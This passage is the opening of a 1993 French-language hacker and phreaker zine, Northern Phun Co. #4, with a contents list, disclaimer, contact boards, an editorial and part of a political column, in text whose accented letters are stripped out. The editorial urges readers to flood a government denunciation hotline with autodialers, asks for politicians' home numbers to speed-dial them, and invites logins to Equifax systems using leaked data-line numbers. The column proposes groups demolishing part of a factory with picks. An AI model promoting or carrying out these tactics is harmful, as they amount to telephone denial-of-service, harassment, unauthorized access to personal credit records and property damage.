-=A PREVIOUSLY UNKNOWN LIFESTYLE=- 25-02-93 Dans ce quatrime numro de NPC: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ͻ ۺ Ķ ۺTable des matires / Disclaimer -=ThE PoSSe=- ۺditorial de NPC #4 Blitzkreig ۺLe franc parler du vieux Mde Merlin l'Emmerdeur ۺThe postman always quote twice Votre courrier ۺLa scurit des rseaux Blitzkreig ۺThe Bread Box -=ThE PoSSe=- ۺPour payer ses comptes du Bell THX 1138 ۺLes adieux de Predat0r Blitzkreig ۺComment hacker les VMB Mental Floss ۺHacker d'une forteresse Blitzkreig ۺChrie, barre les portes on sort...Santa Claus ۺCrer des acomptes sur VAX SubHuman Punisher ۺO sont passs tous les rebelles? Blitzkreig ۺquifax et vous... Atreid Bevatron ۺLes systmes du Bell Blitzkreig ۺThe NPC song L0grus ۺSmarts Drugs Redux Coaxial Karma ۺNouveau systme pour les pompiers Blitzkreig ۺSteve Jackson et Sun-Devil L0grus ۺLa fabrication d'un warez Blitzkreig ۺInitiation DATAPAC Fairy Dust ۺTrashing, Bell style -=ThE PoSSe=- ۺLes ROLM-CBX Silicon Phreaker/UPI ۺRead the news... -=ThE PoSSe=- ۺFiction et compagnie Dynamix ͼ NPC are: Officiers Collaborateurs Blitzkreig Santa Claus Coaxial Karma Fairy Dust Mental Floss Silicon Phreaker Atreid Bevatron Merlin L'Emmerdeur The SubHuman Punisher THX 1138 L0grus Invit spcial Dynamix Greets to: Lost Avenger and the UPI gang Knight Excalibur Gengis Dan Master Ninja (Passe moi le beurre) DISCLAIMER - AVERTISSEMENT Ce magazine n'est pas recommand aux gens qui portent un Pacemaker, aux mes sensibles, et aux moralisateurs. Tenez-vous le pour dit, et abstenez- vous! Ceci va probablement tre le disclaimer le plus long de l'histoire des magazines underground car, sur les conseils de gens gnralement bien verss dans le domaine (vous savez que les avocats rclament 150$ de l'heure? Chi!) une mise au point exhaustive doit tre faite avant de vous permettre de poursuivre votre lecture (et non pas de poursuivre Northern Phun Co.: vous tes pas drles!). 1) Tous les articles de ce magazine ne sont publis qu' titre d'information. L'application de une ou des technique(s) explique(s) dans ces pages peuvent entraner la mort, des blessures srieuses, l'impuissance, la perte de votre virginit, des poursuites judiciaires embtantes, le bris de votre ordinateur, la nomination de Camil Samson la tte du Parti Libral ou, pire encore, vous pourriez devenir comme vos parents! 2) Northern Phun Co., qui est un organisme but non-lucratif, avec une vocation quasiment philanthropique, ne sera en aucun temps tenu pour responsable de l'irresponsabilit des auteurs qui publient des articles dans ces pages. L'entire responsabilit, et la preuve de la vracit desdits articles, revient aux auteurs. On est mal parti, l, les enfants... 3) Les officiers clairement identifis de Northern Phun Co. sont seuls habilits parler au nom du groupe, et NPC ne serait tre tenu pour responsable de la conduite (ou de l'inconduite) des collaborateurs de NPC sur les babs de la plante Terre. De plus, seuls les textes des officers de Northern Phun Co. sont vrifis pour leur exactitude. 4) La lecture de Northern Phun Co., quoique rjouissante, peut entraner aussi des problmes de sant mentale et des cas de pilosit manuelle (comme pour la masturbation). 5) Northern Phun Co accepte, priori, de publier tous les textes touchant au H/P/C/A/V-et-le-reste qui lui seront soumis. NPC refusera, par contre, tout texte encourageant la discrimination d'une ou des personne(s) en fonction de leur origines ethniques, de leur religion ou de leur sexe. Si vous voulez bouffer du ngre, engagez-vous plutt dans la police... 6) Northern Phun Co. tient rappeler ses lecteurs qu'il faut soigneusement se brosser les dents aprs chaque repas. Et n'oubliez pas la soie dentaire! Est-ce que a suffit l? O nous rejoindre? ------------------ D la nature "volatile" de notre produit, les babs qui nous supportent le sont tout aussi. Ceci dit: Vous avez toutes les chances de pogner un des officiers de NPC sur les babs PUBLICS suivants (on pousse la perversion jusque l!). Galaxy BBS : 418-628-5150 Light BBS : 418-651-5664 Wild BBS : 418-658-8939 Black Palace : 418-831-1602 Si votre babillard public (hors 418) dsire ouvrir une section NPC, n'hsitez pas nous contacter. C'est gratuit! Nous sommes aussi (naturellement) sur les boards pirates de Qubec. En fait, sur Workshop, il y a tous les officiers de NPC qui prennent un bain de soleil... C'est comme qui dirait notre H.Q. underground. Alors, si vous voulez venir y jeter un coup d'oeil, laissez un message sur une de nos VMB, et on vous rappellera. Nos sites officiels H/P hors-418 sont: Silicon Valley 204-XXX-XXXX The Works 617-XXX-XXXX The Dial Up 514-XXX-XXXX Brain Damage 819-XXX-XXXX The Pentagon 416-XXX-XXXX A Montral, NPC est aussi, officieusement, chez Metal Addiction, Cybernetic Violence et Phrozen Realm, et plusieurs autres. Your best bet is... Quelqu'un a parl de VMB? Essayez celle-i: 1-800-521-2070, code *169 (VMB) Nous avons aussi deux adresses Internet pour e-mail: subhuman@silicon.bison.mb.ca tsp@works.UUCP Un site FTP suivra trs bientt... Et si malgr tout a vous n'tes pas capable de nous rejoindre, appelez l'Arme du Salut, et demandez Roger... CE MAGAZINE EST COMMANDITE PAR BELL SPCIAL "CONSCIENCE SOCIALE" A BAS LES CRAPULES! ------------------ DITORIAL par Blitzkreig On va faire a sobrement, les amis. Ouvrez les rangs. Tendez les mains. On distribue les couteaux... a parle au diable! Dj le numro quatre! Et quel numro! The best, the biggest, and the wildest ever! C'est comme on vous le dit! Par la barbe du prophte! La cl qui supporte mon point d'exclamation est barre!!! Un drle de mois dans l'actualit, ce fvrier, non? On dirait que, peu prs vers le temps o ils doivent payer les achats des ftes sur leurs cartes de crdit, les politiciens dconnent. Frustration? Appt du gain? Et le rsultat, c'est des conneries de lois TOTALEMENT aberrantes. Le ministre Valcourt, par exemple, qui tente de faire passer sa nouvelle politique sur le chmage... Permettez-moi de vous resservir une image use, certes, mais oh! combien juste: le gouvernement a dcid que le meilleur moyen de rgler le problme pineux chmage, c'tait de se dbarrasser des chmeurs. Pas de s'en dbarrasser en leur trouvant des jobs, non. C'est trop compliqu, a. En s'en dbarrassant purement et simplement. Un des futurs projets que caresse le gouvernement est d'engager les Hell's Angels comme sous-contractants: le fleuve va bientt tre rempli de cadavres de chmeurs cousus dans des sacs de couchage... J'exagre peine, les kids. Della Noce, un sombre abruti dput du comt de Duvernay, conservateur de surcrot, eu la brillante ide de mettre sur pied une ligne 800, pour encourager la population canadienne jouer aux dlateurs, et dnoncer leurs voisins. Brillante ide! Comment n'y avait- on pas pens plus tt? Bon sang, mais c'est bien sr! A quand les chambres gaz? Pour plus de dtails, allez jeter un petit coup d'oeil la fin de cet ditorial. Il y a l un petit billet de Jean V. Dufresne, et un autre de Pierre Foglia, sur le sujet qui vous y attendent. Bon, vous en avez pas assez de ces enfoirs qui jouent avec nos nerfs? Vous voulez vraiment que notre peuple vire collabo, comme dans les jours les plus sombres du nazisme, du communisme, et de tous les autres "ismes" qui n'ont jamais eu pour but que de ravaler l'homme au rang de btail? Aujourd'hui, on veut vous encourager dnoncer vos frres, peu importe qu'ils fraudent l'assurance-chmage ou pas. Demain, on va avoir une ligne 1-800 pour dnoncer le collgue de travail qui fume dans son bureau, une autre pour dnoncer l'tudiant qui ne met pas de condom pendant ses relations sexuelles, une autre pour dnoncer la mamie qui ose donner des os de poulet son chien, alors qu'il pourrait s'trangler, le pauvre... C'est a que vous voulez? Vous n'aurez de cesse de jouer aux cafardeurs tant qu'il n'y aura pas un numro pour dnoncer les dnonciateurs? Vous allez mme appeler pour vous dnoncer aux autorits? Non. Je ne le crois pas. A part quelques demeurs ici et l, vous vous rvoltez comme nous lorsqu'on vous parle de dlation sans motifs valables. Le concert de protestations qui s'est lev l'annonce de l'instauration de cette "hot-line" a fait temporairement reculer les conservateurs. C'est rassurant de voir qu'il reste encore des gens qui ont une certaine notion de dcence, et qui n'hsitent pas dnoncer le gouvernement lorsqu'il fait des conneries (c.a.d. bien souvent). Le rsultat de ce toll: la ligne est sur la glace. Pour combien de temps? Alors, voici ce qu'on va faire, les touts petits: on va leur rendre la monnaie de leur pice, on va vous garrocher ce numro 1-800, celui de la ligne de dlation, s'il revient jamais dans le portrait, et vous allez composer, les amis! Oh! Pas vous personnellement en personne, hon! Laissez plutt votre ordi servir une leon aux politiciens. Un petit autodial configur dans le sens du monde, une trentaine de jeunes qui dbutent, mais qui ont du beat, et on est capable d'overloader toutes les nodes de cette ligne odieuse! Pensez-y: si nous pouvons accaparer, 24 heures par jour, la ligne de la honte, les vrais dlateurs -ces petits trons dgoulinants- ne pourront pas vendre leurs voisins. Pas besoin de rpondre, non, il suffit seulement que votre autodial soit configur pour composer le numro, et composer, et composer. Lorsqu'il accroche la ligne, il raccroche automatiquement et se remet composer, composer, composer... C'est pas illgal, a, les mecs, ce n'est pas un geste de dsobissance civile, ce n'est pas un crime non plus, rien. Lorsqu'il y a des lections, les gens manifestent leurs sentiments envers le gouvernement en allant voter. Entre les lections, on parle avec nos pieds lorsqu'il y a une manifestation. Et lorsqu'il y a un numro de tlphone qui incite des gens dcents et normaux se comporter avec autant de moralit qu'un misrable vermisseau se rfugiant sous une roche, on vote avec nos tlphones. Ds que le numro est connu, les mecs, c'est promis, on vous le poste, et on vous enverra un speed-dialer en prime, si vous n'en avez pas! Tiens, une dernire ide sur le sujet: puisque Valcourt et Della Noce aiment tellement les tlphones, on pourrait aussi les speed-dialer? Quelqu'un pourrait-il nous trouver leurs numros domicile? Ces enfls! Quand je pense qu'au provincial, un simple dput comme cette enflure de Richard Holden possde un budget DISCRTIONNAIRE (a veut dire qu'il le droit de le dpenser n'importe comment... et c'est ce qu'il fait, l'abruti!), un budget de 100 000$ par anne! Je me demande quel est le budget discrtionnaire de Valcourt et de Della Quasimodo? Il faut en buster des fraudeurs pour payer les dpenses de ces gens-l! Je suis parti, l, ne m'arrtez pas! QUIFAX, maintenant: vous savez que cette compagnie de recouvrement possde des dossiers sur plus de QUINZE millions de canadiens? Et c'est la manire dont ils se les procurent qui est particulirement dgueulasse. Encore une fois, allez jeter un coup d'oeil dans notre revue de presse... quifax sait tout sur vous... et le vend sans aucun discernement au plus offrant. On s'est dit qu'il serait temps que VOUS sachiez tout sur quifax... Ce n'est que justice, votre honneur, j'invoque la lgitime dfense! Non, srieusement, Atreid Bevatron vous a concoct un premier texte sur Equifax. On a mis la main sur le manuel d'utilisation, section "entreprises" et "citoyen", du systme informatis de cette compagnie, ainsi que sur le numro de tlphone data d'quifax Qubec! Nous commenons ici vous livrer, pieds et poings lis, ces informations! Soyez prudents, et allez vrifier vos dossiers de crdit pour y voir les horreurs qu'on y crit... et dites-vous que la plupart de vos concitoyens n'ont pas la chance d'avoir les connaissances et la matrise de la technologie ncessaires pour faire de mme. Pensez eux lorsque vous loggerez, kids... Ha! C'est vrai! Vous allez avoir besoin du "term" pour logger... Regardez sur les babs undergrounds frquents par NPC: un petit cadeau va bientt y apparatre, courtoisie de vos petits amis du North... avec un fichier en prime, contenant tous les numros des lignes data d'Equifax Qubec. J'aurais bien le got de vous faire une monte de lait sur les grands pollueurs, comme Tioxyde, qui menace de fermer son usine si on ne lui permet pas de continuer polluer impunment le St-Laurent. Voyons si les couillons qui nous gouvernent vont se plier ce chantage... Mais pas de monte de lait, autrement: notre ex-felquiste prfr, Merlin L'Emmerdeur est dj pass l avant moi. Ne manquez pas le deuxime volet de sa srie sur la rsistance passive, qui suit immdiatement cet article. Il y rpond d'ailleurs, avec plus de tact et d'esprit que je n'en aurai jamais, aux dtracteurs de Northern Phun Co., ces bons petits diables... Et pour le reste du magazine, plein de bonnes choses. On vous donne dj plusieurs des outils dont vous aurez besoin pour aider le peuple se dbarrasser des crapules. Un texte, qui lui aussi fera date, sur le hack des Voice Mail Box, de A Z, par Mental Floss. C'est simple comme bonjour, dudes. Vous pouvez facilement hacker 2 VMB par semaine, sans respirer. Mais une VMB 800, c'est plus qu'un rpondeur tlphonique, les amis, a peut aussi tre le PBX par excellence! En effet, l'utilisation des out-dials des VMB suivront dans NPC #5... Un texte de Coaxial Karma qui se veut la suite logique de mon article (voir NPC #2) sur les smart drugs. Cette srie se poursuivra aussi dans NPC #5. Un texte de The SubHuman Punisher sur les VAX. Un texte de THX 1138 sur le civisme qui va encore vous faire jubiler, ou vous faire rager, c'est selon. Une visite de Santa Claus du Cybernetic Violence, un des Grands Boards dans le 514, avec un indit de Bruce Sterling en prime! Quelques petits textes de votre serviteur sur les rseaux et toute cette sorte de choses. Et puis... un petit texte de Fairy Dust, une espce d'intro sur les DATAPAC du Bell. C'est pas risqu de hacker ? En tous les cas, c'est, nous dit-il, le premier texte d'une srie sur ces lignes haute vitesse... Logrus nous offre le premier volet d'une paire d'articles sur STEVE JACKSON GAMES. Rappellons brivement que cette compagnie de jeux amricaines tait passe au batte lors de l'opration Sun-Devil... Beaucoup mieux... Northern Phun Co. -le mensuel- a rvis sa politique ditoriale. Vous tenez le NOUVEAU NPC entre vos mains: 1) Fini le trash, le rag ou les mdisances outrance sur les quelques losers du 418. Nous comprenons que a peut devenir fatiguant, la longue, et que a laisse une mauvaise impression de la scne Qubec nos lecteurs des autres rgions. Et puis, quand il s'agit de dtruire la rputation d'un lame, on a maintenant PHUN WEEK ONLINE! Eh oui, pour les lecteurs hors-418 qui ne seraient pas au courant, NPC a commenc publier un HEBDOMADAIRE, en plus du mensuel que vous tenez entre vos mains. Un hebdo qui ne peut se d/l, et qui doit tre lu online (ou captur). Seules les personnes visitant nos babs 418 peuvent se repatre de cette lecture! Sorry guys! 2) Davantage d'articles "pointus" sur le phreaking, pour les connaisseurs plus avancs. On va bien entendu garder un aspect "gnraliste", histoire de ne pas abandonner les dbutants H/P, mais une grosse partie de ce mag va tre TRES technique. Nous venons nous-mme du milieu du phreak, et c'est notre coeur qui parle... 3) Northern Phun Co. n'est pas qu'un magazine de piratage! On l'a toujours dit, on le rpte encore: il y a des gens qui sont plus durs de comprenure que d'autres... CONTRE-CULTURE est le mot cl, ici, les amis. ACTIVISME SOCIAL en est un autre. Capice? 4) Northern Phun Co. a dcid de s'associer avec les autres groupes canadiens et amricains publiant des 'zines underground! Une entente a t conclue entre UPI (United Phreakers International) et NPC pour l'change de textes entre les deux parties. Attention! a ne veut pas dire qu'on va publier des textes de UPI vieux de cinq ans, traduits en franais! Au contraire! On parle ici de traduction et de publication SIMULTANE de nouveaux textes. A preuve le texte prsent dans ce numro de Silicon Phreaker, UPI du 514, qui ne paratra en anglais qu' la fin avril... Deux autres "joint-venture" sont prsentement l'tape de la ngociation. De plus, vos officiers NPC seront la prochaine runion 2600 New-York, le 6 mars prochain. On espre revenir de ce meeting, o se retrouvent habituellement Emmanuel Goldstein et les plus fameux pirates de la cte Est, avec des bonnes nouvelles! ----------- Ct mauvaises nouvelles, il faut que vous sachiez que nous avons eu quelques petits problmes avec des gens qui s'taient mis en tte de nous dnoncer... Mais cei tant strictement un problme 418, on va pas vous emmerder avec ... Qu'il nous suffise de dire que nous avons rapidement rgl le problme, et sans effusion de sang, encore! Un rit complet de cette passionnante aventure devrait apparatre dans un des prochains PHUN WEEK ONLINE. C'est super buggant, la dlation, il ne faut pas se le cacher... C'est super crtin aussi. Mais vous n'tes pas oblig de me croire, lisez les journaux des dernires semaines... Leeched from LE JOURNAL DE QUBEC - vendredi 12 fvrier 93 VALCOURT DLATEUR par Jean V. Dufresne C'est le mtier le plus ignoble qui soit. Mais plus abjects encore sont ceux qui encouragent la dnonciation anonyme, tel le ministre fdral d'Emploi et immigration, qui propose l'tablissement d'une ligne tlphonique officielle du gouvernement, gratuite et accessible tous les citoyens assez dgueulasse pour dnoncer leur voisins, qu'ils souponneraient de frauder l'assurance-chmage. Bernard Valcourt est d'accord pour faire de la dlation une politique officielle de l'tat canadien. Si je n'avais pas de sympathie l'gard de ceux qui souhaitent rehausser les critres de slection policire, je proposerais cet homme de se recycler en agent double. Voil o nous en sommes rendus avec la rforme de l'assurance-chmage. On laisse maintenant aux dlateurs le soin de dbusquer ceux qui pourraient abuser de la nouvelle loi, elle mme gnratrice des pires abus. Or, la dlation, on c'est ce que c'est. Elle est faite de mesquinerie, de vengeance, de jalousie, de rglements de comptes personnels. Elle confre n'importe quel citoyen canadien, sur la foi du moindre soupon, sans preuve aucune, le pouvoir de dclencher une enqute policire sur un coup de fil anonyme. Vous voulez vous venger de votre locataire qui vous a tran devant la Rgie du logement, de la voisine vivant de l'aide sociale, qui partage son trois-pices avec son chum? Faites marcher vos doigts parce que le numro de tlphone sera dans le bottin. Et, en toute lchet, parce que la Commission d'assurance chmage vous garantit l'anonymat. C'est ainsi que, en Europe, sous l'occupation nazie, les collabos dnonaient les juifs. La dlation, c'est le premier chanon de l'tat policier. L'ide - et il s'en vante - mane de l'paisse cervelle du dput conservateur de Duvernay, Vincent Della Noce, bien connu pour sa dfense des "bedaines qutaines" de nos villgiateurs floridiens. Politiquement adipeux, Della Noce. Et suprmement malhonnte avec part a. Pour justifier son initiative, il la compare Info-Crime, un programme qui invite les citoyens assister la police dans la recherche des criminels. On voit o il veut en venir, Valcourt: banaliser la dlation, en faire un devoir civique, une obligation morale, susciter le frisson du hros, chez ceux qui sont des lches. Malhonnte, parce que Info-Crime, c'est autre chose que la dlation. C'est la police qui a dj fait enqute, c'est l'vad dj condamn, c'est le violeur dont on a perdu la trace. Ce n'est pas le chmeur mis la misre par un crtin de fonctionnaire bien bord dans la douillette de sa permanence. Ou de sa pension de dput, comme Della Noce. Les consquences de la dlation? On va tourner les pauvres contre les pauvres, parce que laissez-moi vous dire que les appels anonymes ne viendront pas des hauteurs d'Outremont, mais des faubourgs du centre-sud. Pas de Hamstead, mais de St-Jrome. Et cet inconscient de Valcourt, se rend-il compte qu'il va aussi tourner ces bons Canadiens de souche contre tous ceux qui ont la peau fonce parce qu'il est acquis, n'est-ce pas, que ce sont les immigrants de Hati et de Jamaque et les Vietnamiens et les Chinois qui viennent ici vivre au crochet de nos impts? - 30 - Leeched from LA PRESSE - Lundi 15 fvrier 1993 LES PREDATEURS par Pierre Foglia UNE LEPRE MDIOCRE Dj embarrasss par l'impopulaire rforme de l'assurance-chmage, les dputs conservateurs se sont dpchs de demander Vincent Della Noce de fermer sa gueule et sa ligne rouge. Pas assez vite toutefois. Della Noce avait eu le temps de faire l'apologie de la dlation devant toutes les camras du pays. Sa brillante ide: une ligne rouge qui inviterait dnoncer anonymement son voisin, son mononcle, son beau-frre, ds lors qu'on les souponnerait de frauder l'assurance-chmage. "Ben quoi, qu'est-ce que vous avez contre a?" s'est tonn le dput de Duvernay. "Je l'ai dj fait moi, Je suis pas mort!" Tu ne risquais rien monsieur le dput. La mdiocrit n'est pas mortelle. La lpre non plus. La dlation n'est pas autre chose: une mdiocre lpre. Doit-on dnoncer le voisin qui maltraite ses enfants? Peut-tre. Aprs l'avoir averti qu'on allait le faire. Dnoncer le systme aussi, et ses reprsentants chaque fois qu'ils abusent de leur pouvoir. Pour moi la liste s'arrte l. Les voleurs, les trafiquants, les drogus, les vads, les terroristes, les faux rfugis, les gens qui travaillent au noir, ceux qui fraudent l'impt, ceux qui passant des trucs la douane, ceux qui vont en Floride avec leur assurance-chmage, compte jamais sur moi pour te le dire, Della Noce. Tu sais c'est quoi l'tat policier? Non, c'est pas quand la police est au pouvoir. Ca c'est la dictature. L'tat policier c'est quand une majorit de citoyens se rveillent le matin avec une me de flic. - 30 - Malheureusement, plusieurs sysops de la rgion de Qubec ont une me de flic... Ou alors se destineraient-ils une carrire politique? On aurait pu continuer ainsi les citations, et aller chercher Sir Winston Churchill, par exemple, qui disait ( propos des collabos franais): Les dlateurs "are the lowest lifeform known to man" Et de par l'histoire, nous le savons tous, les dlateurs ont toujours abond. Judas D'Iscariote lui-mme... Mais vous savez comment il a fini, Judas... Mais assez sur ce sujet, je crois que je vais vomir. On fera le point au prochain numro... Ceci dit, nous croyons qu'avec ce numro quatre, Northern Phun Co. vient de trouver sa vitesse de croisire. On regarde devant nous, et l'azur est radieux! On regarde derrire nous, et il n'y a que quelques cabots qui s'acharnent encore s'entre-dchirer pour les restes de la chrysalide... Vous avez dj vu le film de Francis Ford Coppola, LE PARRAIN? Mon bout prfr, c'est quand le producteur se rveille un beau matin avec la tte de son cheval prfr dans son lit! HaHaHa! Stay with us, folks, 93 is gonna be a pretty good year! BELL, PARTENAIRE EN AFFAIRES LE FRANC PARLER DU VIEUX MEDEE LOGE DE LA SUBVERSION par MERLIN L'EMMERDEUR Vous tes le symbole mme du bon et honnte citoyen. Vous payez vos impts avant le trente avril, vous achetez des obligations d'pargne, vous allez voter rgulirement tous les cinq ans pour le moins pire, vous dormez prudemment, vous avez fait laminer votre mdaille d'obissance. Vous tes un gentil citoyen! Vous croyez l'autorit, vous croyez la loi et l'ordre, vous croyez que le pape est infaillible, vous croyez que Dieu est blanc et catholique, vous croyez qu'au fond Robert Bourassa est indpendantiste et qu'il a une paire de couilles entre les jambes, vous croyez que le cardinal Lger tait plus saint que con, vous croyez que Joe Clark aurait mieux fait que John Turner ou Brian Mulroney, vous croyez que Solange-Ca Pue-Rolland cessera un jour de brailler comme une vache, vous croyez que Jeanne Sauv a t une grrrrrande canadienne, vous croyez qu'Elizabeth II chie de l'encens et de la myrrhe, vous croyez que le gentilhomme la verge noire mrite 110 mille dollars par anne, vous croyez que Jean Crtin est capable d'avoir une ide (mme intelligente), vous croyez qu'Andr Arthur dit tout haut ce que tout le monde pense tout bas, vous croyez que Baderne Powell et le baron de Coubertin n'taient pas que vieux, snobs et cons, vous croyez que J.F.K. tait un grand prsident (informez-vous), vous croyez que Saddam Hussein est une plus grande vermine que George Bush, vous croyez que les centrales nuclaires sont sres. Vous tes un gentil citoyen. Vous croyez qu'un nouveau gouvernement va changer les choses, vous croyez que les femmes au pouvoir feront mieux que les machos, vous croyez qu'on apprend lire et crire l'cole, vous croyez que les mdecins pratiquent la mdecine, que les avocats dfendent la veuve et l'orphelin, vous croyez que Dieu a cr l'homme son image et sa ressemblance, vous croyez que les faux cons sont des oiseaux en voie de disparition. Vous tes un gentil citoyen. Vous croyez que vous n'tes pas responsables de la situation mardique dans laquelle on se retrouve tous. Nous y reviendrons, mais avant jetons un coup d'oeil sur ladite situation. Il ne faut pas insulter impunment de la bonne marde... a) Les jeunes et les baleines se suicident. Les politiciens et les snateurs ne se suicident pas. B) Rien ne va plus dans le btiment, on manque de prisons. C) La moiti de nos lacs sont morts, les autres sont moiti morts. D) Les usines ferment, les soupes populaires aussi. E) La violence est partout, surtout au Tljournal, l'cole et la maternelle. F) Les rablires meurent, les grenouilles aussi, les blugas aussi, les morues aussi, les truites aussi, les homards aussi, les crevettes aussi, alouette. G) Pour rpondre la crise conomique, Robert Bourassa ouvre des casinos. H) Sur chaque dollar gagn, il reste 15 cents en rel pouvoir d'achat. Or, un sac de peanuts cote 95 cents. I) Nos vieilles ne tricotent plus, elles grattent des gratteux de Loto- Qubec. J) C'est le retour de la Prohibition et Claude Elliot Ness Ryan. K) Pour refroidir les sans-abris, on coupe les arbres. Le fonctionnaire responsable est toujours vivant. L) L'alternative Brian Mulroney est Jean Crtin. M) On emprunte pour payer la dette nationale. N) L'Irak doit se plier aux rsolutions de George ONU Bush. Isral n'est pas tenu de se plier aux rsolutions de l'ONU. O) On a ralis, depuis 1940, 3066 expriences nuclaires. On en fait encore. P) On qute pour construire des hpitaux pour enfants cancreux. Les enfants cancreux meurent quand mme, on leur paye un voyage Disneyland. Q) Autrefois on naissait avec les gnes de ses parents. Aujourd'hui, on nat avec la dette de ses parents ($70,000 dollars par tte). R) Deux individus sur 10 sont chmeurs, on exporte des billots Tawan, on importe des cure-dents de Tawan. S) On exporte des vieux et leur pension en Floride. On importe des cancers de la peau de Floride. T) Triomphe de la haute technologie: comment transformer un fleuve majestueux et 688,000 km de rivires en fosse septique. U) On change des panneaux "stop" en panneaux "arrt", on change des panneaux "arrt" en panneaux "stop", on change des... V) La couche d'ozone dcrisse, Ral Gigure anime Jeopardy. W) Dieu dteste les tapettes, le juge Bienvenue aussi, le sida aussi, seuls les tl-preachers peuvent gurir les sidatiques. Envoyez vos dons Billy... X) On change les chmeurs en BS, on change les BS en chmeurs. On appelle a: formation professionnelle, formation aux adultes, programme SPRINT, etc. Y) Depuis quarante ans, le taux de spermatozode par centilitre de sperme a diminu de 50% (absolument vridique). Si la tendance se maintient, Radio-Canada annonce la fin de l'homo stupiditus pour l'an de grce 2033. Z) Superman est mort et Zorro s'est recycl dans la construction de cabanons de jardin. Voil o on en est Et pourtant vous avez toujours t un bon petit citoyen respectueux des lois et de l'autorit lgitime. Voil pourquoi il faut de toute urgence dboulonner tous ces pas bons, tous ces incapables, tous ces pitres, toutes ces andouilles et tous ces trou-du- culs qui nous gouvernent. Les tides diront que nous sommes tous coupables, qu'il ne faut pas seulement blmer les politiciens, et qu'on a les lois qu'on mrite. Il y a du vrai l-dedans, mais commenons par le commencement. Flushons d'abord les pas bons puisqu'ils n'ont pas la dcence de se flusher eux-mmes. Les mmes tides diront encore qu'il faut agir dmocratiquement. Un peuple qui a vot QUATRE FOIS pour Robert Bourassa ne fera jamais rien pour sauver sa peau. C'est tout vu et class... Voil pourquoi il faut verser dans la subversion. Qu'il se lve, celui qui a mieux proposer! ---------- Comme d'habitude, je vous livre une petite anecdote avant de passer au volet pratique de ce court expos. Il y a quelques annes (deux ou trois), une grosse compagnie du genre Sears ou Eaton a t condamne une forte amende pour avoir escroqu sa clientle quant la qualit et la nature des pierres (soi-disant) prcieuses qu'elle leur vendait. Quoique pondu en novembre, le jugement ne fut rendu public que le 15 janvier suivant. Vous savez pourquoi? Pour ne pas nuire aux affaires de la compagnie pendant la trs lucrative priode des Ftes. Moi, j'appelle a de la complicit aprs le fait. Les trs honorables juges de la Cour Suprieure de l'Ontario dtiendraient-ils des blocs d'actions votantes dans la compagnie? Cela s'appelle "conflit d'intrt". Beaucoup de politiciens ont perdu leur job pour a, mais les juges, dans ce systme, sont intouchables. Ils ont l'injure au tribunal facile. Il n'y a rien de plus susceptible qu'un honorable juge. Par ici, les juges rclament de faramineux salaires afin, disent-ils, d'chapper aux influences INDSIRABLES (quelle lgance pour dfinir la corruption). Il y a pourtant une autre faon de s'assurer de l'intgrit de juges: dans l'ex-URSS, on pendait les juges corrompus. sauf, bien sr, s'il s'agissait du gendre du secrtaire-gnral du PC, l'exception confirme la rgle... Bref, revenons sur terre. Aprs des annes d'efforts soutenus et ingrats, les mouvements cologiques obtiennent de bien maigres rsultats. Greenpeace et cie veulent que l'on cesse de tuer les baleines et les dauphins, ils veulent que l'on cesse de jeter notre marde et notre plutonium dans les mers, ils veulent pargner la dernire pinette noire du continent. Presss par l'opinion publique, comme ils en ont l'habitude, les politicaillards rcuprrent la vague en lui enlevant toute signification. Fbriles comme des soubrettes en manque, ils dcrtent qu'il est dsormais interdit de fumer en dehors des fumoirs autoriss et qu'il est obligatoire de tirer bout portant sur les contrevenants. Cinquante mille bonnes femmes occupant le poste de directeure des ressources humaines (?) de toutes les entreprises du pays partent en croisades, en guerres saintes. Ces pauvres types de Greenpeace ne voulaient que sauver la plante... Interdire la cigarette, c'est facile, a ne cote rien, et il n'est pas ncessaire d'avoir des couilles au cul pour l'imposer. les lecteurs sont contents et la compagnie Tioxide (de Tracy) peut continuer jeter 120 tonnes mtriques d'acide dans le St-Laurent tous les jours, 365 jours par anne. Des blugas, a ne vote pas: ils se contentent de crever, ces ingrats... Il n'y a rien faire, dites-vous! Non, il y a toujours quelque chose faire et il faut le faire mme s'il tait trop tard. De grce, les mmes, ne soyez pas aussi cons que vos vieux. Voici, here is, mon plan (de ngre?). Il faut former une premire cellule de dix personnes. On appelle Environnement Qubec qui nous apprend (?) que le plus grand pollueur du coin est Daishowa, l'ex-Reed Paper, l'encore plus ex-Anglo Pulp and Paper Co... On s'arrte chez le Rona de votre voisinage, on achte chacun un pic et une pioche, on prend l'autobus et on se fait dposer devant l'usine. Alors, on se met tranquillement dmolir un coin de l'difice. videment, on aura prvenu la presse auparavant. videment, on aura mme pas le temps d'arracher deux briques avant l'arrive en force des flics. On se laisse docilement arrter, tout le monde se dclare non- coupable et tout le monde plaide la lgitime dfense, car il s'agit vraiment de lgitime dfense: ces ordures nous empoisonnent l'eau et l'air. Quelle est la diffrence avec le gars qui empoisonne sa belle-mre petites doses d'arsenic? Il faut prvoir qu'un gars sur la gang sera sur le B.S. C'est lui qui embauchera un avocat et c'est l,aide juridique qui paiera l'avocat. Au pire, chacun copera d'une amende et au mieux, il n'est pas exclu que nous gagnions notre cause. Au besoin, nous ferons appel la gnrosit des gens lucides pour constituer un fond de dfense. Si Greenpeace peut rcolter 22 millions de dollars par anne, pourquoi n'en obtiendrions-nous pas deux ou trois mille? Mais voici le plus beau de l'histoire: la tactique ne peut russir que si elle fait boule de neige, et que d'autres groupes de dix personnes embarquent dans l'affaire, pour suivre nos traces le lendemain, et le surlendemain, et le jour d'aprs. Le risque est minime, il suffit d'un peu de courage et de quelques heures de libre. Nous aurons l'oreille des mdias, nous de faire notre pub et de dclencher une raction en chane. ATTENTION, nos pires ennemis dans cette affaire ne seront ni l'tat, ni la grande industrie. Nos ennemis seront les travailleurs des usines cibles. Il y a encore des gens qui n'ont pas compris que l'on peut gagner sa vie sans en mourir. Ces gens-l se battront pour leur steak sans raliser qu' MOYEN terme, ils tuent aussi leur propre chiares... Par contre, si l'opration russit, si une lgion d'coeurs se manifeste, le systme judiciaire va vite se retrouver avec une masse de procs couteux sur les bras: il leur faut chaque fois faire une preuve pour ne rcolter qu'une minable amende. La presse est sur les dents, le systme craque. La charge est lourde, les tribunaux sont paralyss, le Trsor paie la fois pour la poursuite et la dfense. Comme lorsqu'il s'agit de dfendre la cause des anglais devant la loi 101. Pour une fois, les politicaillards ineptes devront bouger. Ils devront agir et vite. Il ne faut pas leur laisser une seule seconde de rpit. Ne croyez pas que les politicaillards de merde agiront sans se faire pousser dans le cul. Conformment la perception populaire, un politicien c'est de la merde: si cela n'tait pas vrai, il y a longtemps qu'ils 